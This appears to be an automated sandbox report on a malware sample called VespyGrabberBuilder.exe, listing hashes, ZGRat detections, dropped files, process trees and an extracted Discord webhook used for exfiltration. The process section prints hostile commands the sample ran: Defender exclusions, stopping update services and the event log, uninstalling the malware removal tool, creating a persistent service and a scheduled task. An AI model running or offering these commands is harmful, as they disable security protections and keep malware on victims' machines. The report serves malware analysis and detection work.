Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1799s -
max time network
1792s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
22/02/2024, 20:33
Static task
static1
Behavioral task
behavioral1
Sample
VespyGrabberBuilder.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
VespyGrabberBuilder.exe
Resource
win10v2004-20240221-en
General
-
Target
VespyGrabberBuilder.exe
-
Size
12.6MB
-
MD5
fab385fb154644665f94aca9424fb0ce
-
SHA1
8dc525108cebd97b3127129cc1633a7f31010424
-
SHA256
c08b63c50a78ca119a5ff4fe10592a0f66289708df38349e91e645214aae7576
-
SHA512
07def38b8590ebaa95d7213e77e3892f60f10a87cef797fa07c6feb033f08d4148024360c7c32b5f92441c41236b8a86e66cee59bb51d6fbde97b86923a640e3
-
SSDEEP
393216:NayDfg/3Y8G6jgVINcfwt+F2CZZiLe2Wq:wyDfYPwPwtO2Mie2J
Malware Config
Extracted
growtopia
https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj
Signatures
-
Detect ZGRat V1 34 IoCs
resource yara_rule behavioral1/memory/2844-61-0x00000000003A0000-0x000000000040C000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-69-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-71-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-73-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-75-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-77-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-81-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-93-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-91-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-89-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-99-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-107-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-105-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-111-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-113-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-121-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-123-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-125-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-129-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-131-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-127-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-119-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-117-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-115-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-109-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-103-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-101-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-97-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-95-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-87-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-85-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-83-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-79-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 behavioral1/memory/2844-68-0x00000000003A0000-0x0000000000405000-memory.dmp family_zgrat_v1 -
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 9 IoCs
pid Process 2844 Ilkdt.exe 2624 WinHostMgr.exe 2548 WinErrorMgr.exe 2636 Sahyui1337.exe 2652 KeyGeneratorTOP.exe 2412 KeyGeneratorTOP.exe 2792 WinErrorMgr.exe 480 Process not Found 1648 bauwrdgwodhv.exe -
Loads dropped DLL 11 IoCs
pid Process 2824 VespyGrabberBuilder.exe 2824 VespyGrabberBuilder.exe 2824 VespyGrabberBuilder.exe 2824 VespyGrabberBuilder.exe 2824 VespyGrabberBuilder.exe 2824 VespyGrabberBuilder.exe 2444 Process not Found 2652 KeyGeneratorTOP.exe 2412 KeyGeneratorTOP.exe 2548 WinErrorMgr.exe 480 Process not Found -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 8 pastebin.com 9 pastebin.com 2 discord.com 3 discord.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe bauwrdgwodhv.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe WinHostMgr.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1648 set thread context of 2460 1648 bauwrdgwodhv.exe 81 PID 1648 set thread context of 1784 1648 bauwrdgwodhv.exe 89 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 920 sc.exe 1624 sc.exe 2596 sc.exe 2644 sc.exe 684 sc.exe 3048 sc.exe 2076 sc.exe 2160 sc.exe 2660 sc.exe 2576 sc.exe 2516 sc.exe 112 sc.exe 928 sc.exe 2084 sc.exe -
Detects Pyinstaller 5 IoCs
resource yara_rule behavioral1/files/0x0007000000015d4c-34.dat pyinstaller behavioral1/files/0x0007000000015d4c-32.dat pyinstaller behavioral1/files/0x0007000000015d4c-37.dat pyinstaller behavioral1/files/0x0007000000015d4c-38.dat pyinstaller behavioral1/files/0x0007000000015d4c-51.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1200 schtasks.exe -
Modifies data under HKEY_USERS 6 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90a88c84ce65da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2216 powershell.exe 2636 Sahyui1337.exe 2636 Sahyui1337.exe 2624 WinHostMgr.exe 2348 powershell.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 2624 WinHostMgr.exe 1648 bauwrdgwodhv.exe 2220 powershell.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1648 bauwrdgwodhv.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 2216 powershell.exe Token: SeDebugPrivilege 2844 Ilkdt.exe Token: SeDebugPrivilege 2636 Sahyui1337.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeShutdownPrivilege 2144 powercfg.exe Token: SeShutdownPrivilege 2236 powercfg.exe Token: SeShutdownPrivilege 1016 powercfg.exe Token: SeShutdownPrivilege 2108 powercfg.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeShutdownPrivilege 2472 powercfg.exe Token: SeShutdownPrivilege 2420 powercfg.exe Token: SeShutdownPrivilege 2840 powercfg.exe Token: SeShutdownPrivilege 1992 powercfg.exe Token: SeLockMemoryPrivilege 1784 explorer.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 2824 wrote to memory of 2216 2824 VespyGrabberBuilder.exe 28 PID 2824 wrote to memory of 2216 2824 VespyGrabberBuilder.exe 28 PID 2824 wrote to memory of 2216 2824 VespyGrabberBuilder.exe 28 PID 2824 wrote to memory of 2216 2824 VespyGrabberBuilder.exe 28 PID 2824 wrote to memory of 2844 2824 VespyGrabberBuilder.exe 30 PID 2824 wrote to memory of 2844 2824 VespyGrabberBuilder.exe 30 PID 2824 wrote to memory of 2844 2824 VespyGrabberBuilder.exe 30 PID 2824 wrote to memory of 2844 2824 VespyGrabberBuilder.exe 30 PID 2824 wrote to memory of 2624 2824 VespyGrabberBuilder.exe 31 PID 2824 wrote to memory of 2624 2824 VespyGrabberBuilder.exe 31 PID 2824 wrote to memory of 2624 2824 VespyGrabberBuilder.exe 31 PID 2824 wrote to memory of 2624 2824 VespyGrabberBuilder.exe 31 PID 2824 wrote to memory of 2548 2824 VespyGrabberBuilder.exe 32 PID 2824 wrote to memory of 2548 2824 VespyGrabberBuilder.exe 32 PID 2824 wrote to memory of 2548 2824 VespyGrabberBuilder.exe 32 PID 2824 wrote to memory of 2548 2824 VespyGrabberBuilder.exe 32 PID 2824 wrote to memory of 2636 2824 VespyGrabberBuilder.exe 33 PID 2824 wrote to memory of 2636 2824 VespyGrabberBuilder.exe 33 PID 2824 wrote to memory of 2636 2824 VespyGrabberBuilder.exe 33 PID 2824 wrote to memory of 2636 2824 VespyGrabberBuilder.exe 33 PID 2824 wrote to memory of 2652 2824 VespyGrabberBuilder.exe 34 PID 2824 wrote to memory of 2652 2824 VespyGrabberBuilder.exe 34 PID 2824 wrote to memory of 2652 2824 VespyGrabberBuilder.exe 34 PID 2824 wrote to memory of 2652 2824 VespyGrabberBuilder.exe 34 PID 2652 wrote to memory of 2412 2652 KeyGeneratorTOP.exe 36 PID 2652 wrote to memory of 2412 2652 KeyGeneratorTOP.exe 36 PID 2652 wrote to memory of 2412 2652 KeyGeneratorTOP.exe 36 PID 2548 wrote to memory of 2792 2548 WinErrorMgr.exe 37 PID 2548 wrote to memory of 2792 2548 WinErrorMgr.exe 37 PID 2548 wrote to memory of 2792 2548 WinErrorMgr.exe 37 PID 2548 wrote to memory of 2792 2548 WinErrorMgr.exe 37 PID 2792 wrote to memory of 1200 2792 WinErrorMgr.exe 38 PID 2792 wrote to memory of 1200 2792 WinErrorMgr.exe 38 PID 2792 wrote to memory of 1200 2792 WinErrorMgr.exe 38 PID 2792 wrote to memory of 1200 2792 WinErrorMgr.exe 38 PID 856 wrote to memory of 2396 856 cmd.exe 49 PID 856 wrote to memory of 2396 856 cmd.exe 49 PID 856 wrote to memory of 2396 856 cmd.exe 49 PID 2312 wrote to memory of 2612 2312 cmd.exe 94 PID 2312 wrote to memory of 2612 2312 cmd.exe 94 PID 2312 wrote to memory of 2612 2312 cmd.exe 94 PID 1648 wrote to memory of 2460 1648 bauwrdgwodhv.exe 81 PID 1648 wrote to memory of 2460 1648 bauwrdgwodhv.exe 81 PID 1648 wrote to memory of 2460 1648 bauwrdgwodhv.exe 81 PID 1648 wrote to memory of 2460 1648 bauwrdgwodhv.exe 81 PID 1648 wrote to memory of 2460 1648 bauwrdgwodhv.exe 81 PID 1648 wrote to memory of 2460 1648 bauwrdgwodhv.exe 81 PID 1648 wrote to memory of 2460 1648 bauwrdgwodhv.exe 81 PID 1648 wrote to memory of 2460 1648 bauwrdgwodhv.exe 81 PID 1648 wrote to memory of 2460 1648 bauwrdgwodhv.exe 81 PID 1648 wrote to memory of 1784 1648 bauwrdgwodhv.exe 89 PID 1648 wrote to memory of 1784 1648 bauwrdgwodhv.exe 89 PID 1648 wrote to memory of 1784 1648 bauwrdgwodhv.exe 89 PID 1648 wrote to memory of 1784 1648 bauwrdgwodhv.exe 89 PID 1648 wrote to memory of 1784 1648 bauwrdgwodhv.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\VespyGrabberBuilder.exe"C:\Users\Admin\AppData\Local\Temp\VespyGrabberBuilder.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAcgB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAZAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAYgBxACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2624 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:2396
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:928
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:2644
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2084
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:2076
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GMDTJRUT"3⤵
- Launches sc.exe
PID:684
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"3⤵
- Launches sc.exe
PID:920
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GMDTJRUT"3⤵
- Launches sc.exe
PID:2160
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA351.tmp" /F4⤵
- Creates scheduled task(s)
PID:1200
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2412
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exeC:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1624
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2460
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2660
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2576
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2596
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2312
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart1⤵
- Drops file in Windows directory
PID:2612
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5a4720f9a650d9b0098751a9b7063c375
SHA18eef2b8988d785775161b38f95314863b27b144d
SHA2566d2f6866ef34265b0c60542955986ba206b1bbb45db5f04c5584d01869573807
SHA512fa3f56925cd5254530076a9947e3f21b70518da2cfc521db4b04eaa98842aba357c056b3818c5c06fa16fa9955b32857d6a4ba9546a09b6ff1062f998c82d953
-
Filesize
4.3MB
MD5749e16da9a2c38ef736e33db18a6e09b
SHA12957f352a54c27de463e22f60b07ecc14ae78ffe
SHA2563bb3995012fcd488b7a502d829fc6a2ec82067192fe9900cef1bf4224fbe1857
SHA5128f83be4470330f71bc45f35aa26d37ef465fb7da3efeef2222b9ba62dba72f9129680dfaeb474e3710c9ecdcc7e5e3dbe3fbcd542a345ad00c094b38c51c525a
-
Filesize
6.2MB
MD5c4ae46e22416bc88411d50dbd9856ab1
SHA106fd01ac84b5f566c0493fd9f090fdb2e030f6ed
SHA256754076b4f4b74bfa84fc8260144e2008587e3fdebe45f5dbcda0e862e593fc8c
SHA5128dbe56eb608ec270d346dabf79ca64ab41bd596a8fbf17c6c2d13d9f58f5b30ee269ffd3ef605f0094d13d636da52f317039ea64bd810210469a8097398b8d0f
-
Filesize
5.4MB
MD5825026f2b287ed6034a6145f2061eb8e
SHA11a03ac4615efb77e2f01ab53840f543a70a996bb
SHA256d50dae1f4d27e37a034f086bd19e196e63ee11caab5e2628164f40d3db16670d
SHA512f28aa13d0ee9604f80aaf3fb2f9faa2333f6bcf68a3cecd44f61cd674437fbc18467a993d398390456c050f5a1072a7c85dd5ab798bb2a2367a0bbddeba6a069
-
Filesize
1.8MB
MD5f06223258558d32b15057b6d51702ffc
SHA1cf29bfea585fc30f5f2a03ea924cd55dad02aa10
SHA25626c35afa0783fcbcea457f042b6a65df3870c0321a674a96f5b9079509ed254d
SHA512ba4ed45afb9bbf034e261ef0cbbe41c97da7d607b0f4c78e914e79c053c1b179392d4890d1de25c8ad0fb7339f643e85214711815afd061c5bfece5a12b9401e
-
Filesize
5.4MB
MD5dd27aff358d633af67d1a20624038c6a
SHA1a830d0f2bcfd3180a657ac4db8c790c8dfb0b3b5
SHA2566ded9b5fd0d8379f715700960a7ddfdf7ceb67019059103b9405f5bdac057156
SHA512b81d0dc19e24f5811760109c2dffde3418941f94cb735d07c970ef39345d9d79fe3d5e7ab01792ea1af0b6d599a57050c5ab54f8837eaaae61eceffa531b05a0
-
Filesize
1KB
MD57f673f709ab0e7278e38f0fd8e745cd4
SHA1ac504108a274b7051e3b477bcd51c9d1a4a01c2c
SHA256da5ab3278aaa04fbd51272a617aef9b903ca53c358fac48fc0f558e257e063a4
SHA512e932ccbd9d3ec6ee129f0dab82710904b84e657532c5b623d3c7b3b4ce45732caf8ff5d7b39095cf99ecf97d4e40dd9d755eb2b89c8ede629b287c29e41d1132
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0HYUVDUZQBUXLV8BLDEK.temp
Filesize7KB
MD5e13ea1da6b850fee339fe83314b89adf
SHA1dddc76defbcb2490b0e6995ba47ad104d089f673
SHA25655c7f1a2324b13861174900597e3761dea5751bb38dce6732655ccef63b48fc7
SHA51221be8bc9ac8ef3a66a55db132e5e5ad4e67610f38cc6cbfa4883163c2d1270f946ac8d4cceab152250c29df63f7398ef49a212d4c3f7bc4b7ced50f23a0320af
-
Filesize
1.9MB
MD5196543b959d0f41f8ffbbfafdce5f072
SHA1a5969a292fc5accb64dd13983f0e2ebfdfb61781
SHA2565ff9c4e4b7397f6b59b8d3268c5e8ec5d99fbda1702cc143c1e75843fa986381
SHA5122b47417ed55b4582e2d76cf46727d8578dbfe4ad6a0c56d84a2d72d8e0d47ecd8cc1437e69a74626c3ee3def3209a9a37d450a5867c27b5a1e5130862f6aa4fc
-
Filesize
191KB
MD5e004a568b841c74855f1a8a5d43096c7
SHA1b90fd74593ae9b5a48cb165b6d7602507e1aeca4
SHA256d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db
SHA512402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af
-
Filesize
4.9MB
MD5c108564c8fe1e2d5b11615b17c1f47d6
SHA1315a4fd5ffdb581d06c66d33f2a1964c3cad61d3
SHA256a3dfed0a83fd712ebd1081da4c9f2fa789cce3cd1c7e53bf9dc7ffde4ff77137
SHA5124a2ccff555a1b9e64c105c741cb1b8c1e740db4d6fc2d6c1f7802c22f28fecf4cc03564e985e229df68d2eec781932e4ee1529c71985db0e661da1fda32996d8
-
Filesize
6.1MB
MD57799ba27987e123073807bb846e77820
SHA176635297c39d55304dfe71ecb315cb5c7f3c01f9
SHA256b509f009cae3603578ca187ac24f9dd0bbfcf9c3d19a78b058580b2dc255b659
SHA5126dbc2aba73cb9b27415a3b026623003db8bae5b88d1c5f7cf35857c6dea68469b15b93c9dfc0e1b65e033d8c78772f018de3149c80edbe5756c2b12c3857014b
-
Filesize
316KB
MD5675d9e9ab252981f2f919cf914d9681d
SHA17485f5c9da283475136df7fa8b62756efbb5dd17
SHA2560f055835332ef8e368185ae461e7c9eacdeb3d600ea550d605b09a20e0856e2d
SHA5129dd936705fd43ebe8be17fcf77173eaaf16046f5880f8fe48fc68ded91ef6202ba65c605980bd2e330d2c7f463f772750a1bd96246fffdc9cb6bf8e1b00a2ccb
-
Filesize
42KB
MD5d499e979a50c958f1a67f0e2a28af43d
SHA11e5fa0824554c31f19ce01a51edb9bed86f67cf0
SHA256bc3d545c541e42420ce2c2eabc7e5afab32c869a1adb20adb11735957d0d0b0e
SHA512668047f178d82bebefeb8c2e7731d34ff24dc755dacd3362b43d8b44c6b148fc51af0d0ab2d0a67f0344ab6158b883fe568e4eeb0e34152108735574f0e1e763
-
Filesize
5.0MB
MD5e222309197c5e633aa8e294ba4bdcd29
SHA152b3f89a3d2262bf603628093f6d1e71d9cc3820
SHA256047a7ca1b8848c1c0e3c0fcc6ece056390760b24580f27f6966b86b0c2a1042b
SHA5129eb37686e0cee9ec18d12a4edd37c8334d26650c74eae5b30231c2b0db1628d52848123c9348c3da306ec950b827ec0a56cdf43ee325a9e280022c68193d8503
-
Filesize
5.0MB
MD5cbfb164ae053ade07f3f4a8425de768c
SHA1aaae0db43456b87ade37ca98acf4a8143bd9592e
SHA25663d7430866a73f9d6a8880a8b81428c386b15d467714f1f71d15748118bb67b5
SHA512e91e5450907464a65a4e7fb068550d4435224291cd483fb9001833dfb916e926e10ec2fb56e899c8aa75b20672aac109f7a03daa135b8105e94d0ce48a8faea0